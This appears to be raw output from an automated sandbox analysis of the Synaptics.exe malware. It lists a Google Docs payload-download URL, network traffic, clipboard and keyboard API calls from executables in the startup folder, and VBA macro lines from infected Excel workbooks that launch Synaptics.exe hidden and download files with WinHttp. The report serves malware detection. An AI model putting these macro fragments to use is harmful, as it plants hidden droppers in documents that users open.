                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv8
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadver
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvt
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw.
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw0
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwX
                                Source: Synaptics.exe, 00000008.00000002.3048928487.00000000233BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx1
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx;x
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxuZV
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyD
                                Source: Synaptics.exe, 00000008.00000003.2026291010.00000000075D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadySi
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.6
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.I
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.O
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.q
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.w
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49740 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49755 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49754 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49766 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49767 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49774 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49783 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49788 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49789 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49790 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49787 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49800 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49801 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49810 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49811 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49822 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49831 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49852 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49851 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49870 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49871 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49882 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49881 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49896 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49897 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49904 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49906 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49905 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49926 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49925 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49944 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49945 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49953 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49956 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49970 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49969 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49982 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49980 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50001 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50002 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50019 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50020 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50036 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50037 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50055 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50056 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50075 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50076 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50084 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50086 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50105 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50104 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50115 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50117 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50130 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50129 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50143 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50144 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50160 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50161 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_00237099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_00237099
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_00237294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00237294
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 16_2_00E57294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00E57294
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 22_2_00237294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,22_2_00237294
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_00224342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,7_2_00224342
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 16_2_00E6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00E6F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 22_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_0024F5D0

                                System Summary

                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: 32pAPMdc.xlsm.8.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: HTAGVDFUIE.xlsm.8.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: 32pAPMdc.xlsm.8.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
